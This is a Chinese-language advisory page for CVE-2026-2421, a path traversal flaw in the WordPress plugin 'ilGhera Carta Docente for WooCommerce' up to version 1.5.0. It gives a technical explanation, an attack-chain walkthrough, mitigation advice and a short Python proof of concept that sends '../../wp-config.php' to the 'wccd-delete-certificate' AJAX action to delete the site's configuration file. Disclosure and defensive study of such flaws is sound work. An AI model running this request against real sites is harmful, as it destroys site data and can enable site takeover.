CVE-2026-2421 CVSS 6.5 中危

CVE-2026-2421: WP插件路径遍历漏洞

披露日期: 2026-03-20

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-2421

漏洞类型

路径遍历

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

ilGhera Carta Docente for WooCommerce

漏洞概述

WordPress插件'ilGhera Carta Docente for WooCommerce'在1.5.0及之前版本中存在严重的安全缺陷。由于'wccd-delete-certificate' AJAX动作对'cert'参数的文件路径验证不足，导致路径遍历漏洞。具备管理员权限的认证攻击者可利用此漏洞删除服务器上的任意文件，例如关键的wp-config.php配置文件。攻击者通过删除核心配置文件，可以导致网站瘫痪或强制进入重装流程，从而完全接管网站并可能实现远程代码执行。

技术细节

该漏洞位于插件处理AJAX请求的代码逻辑中，具体涉及`wccd-delete-certificate`动作。在实现该功能时，开发者直接使用了用户通过POST请求提交的'cert'参数作为文件路径进行删除操作，而未对该参数进行严格的目录边界检查或字符过滤（如未使用`basename()`或未校验路径是否在预定目录内）。由于WordPress的`admin-ajax.php`允许已登录用户触发AJAX钩子，且该特定动作未进行额外的权限校验（默认依赖WordPress的登录状态），只要攻击者拥有管理员级别权限，即可构造包含目录遍历序列（如`../`）的恶意参数。例如，将'cert'设置为`../../wp-config.php`，服务器端脚本即会解析该相对路径并删除网站根目录下的数据库配置文件。删除配置文件后，WordPress将无法连接数据库，通常会导致站点显示安装页面或暴露调试信息，结合其他攻击手段可进一步导致远程代码执行（RCE）。

攻击链分析

STEP 1

步骤1：获取权限

攻击者通过钓鱼、暴力破解或其他方式获取WordPress网站的管理员账户凭证。

STEP 2

步骤2：发送恶意请求

攻击者使用管理员权限向`/wp-admin/admin-ajax.php`发送POST请求，设置`action`为`wccd-delete-certificate`，并在`cert`参数中注入路径遍历Payload（如`../../wp-config.php`）。

STEP 3

步骤3：路径解析与删除

服务器端插件代码接收请求，由于缺乏路径验证，直接解析`../../`并跳转至上级目录，执行删除操作。

STEP 4

步骤4：破坏与接管

关键文件（如wp-config.php）被删除，导致网站无法连接数据库，攻击者可诱导或利用重装流程接管网站权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_url = "http://example.com/wp-admin/admin-ajax.php"

# Attacker's cookies (Admin session required)
cookies = {
    "wordpress_logged_in_hash": "your_admin_cookie_hash",
    "wordpress_sec_hash": "your_secure_cookie"
}

# Payload data exploiting path traversal
# Attempting to delete wp-config.php located in the root directory
payload_data = {
    "action": "wccd-delete-certificate",
    "cert": "../../wp-config.php"
}

try:
    response = requests.post(target_url, data=payload_data, cookies=cookies)
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print(f"[+] Response: {response.text}")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

ilGhera Carta Docente for WooCommerce <= 1.5.0

防御指南

临时缓解措施

如果无法立即升级插件，建议暂时禁用'ilGhera Carta Docente for WooCommerce'插件以阻断攻击链。同时，应严格审查网站后台管理员权限，确保仅有可信人员持有管理员账户，并监控服务器文件系统是否有异常的文件删除行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表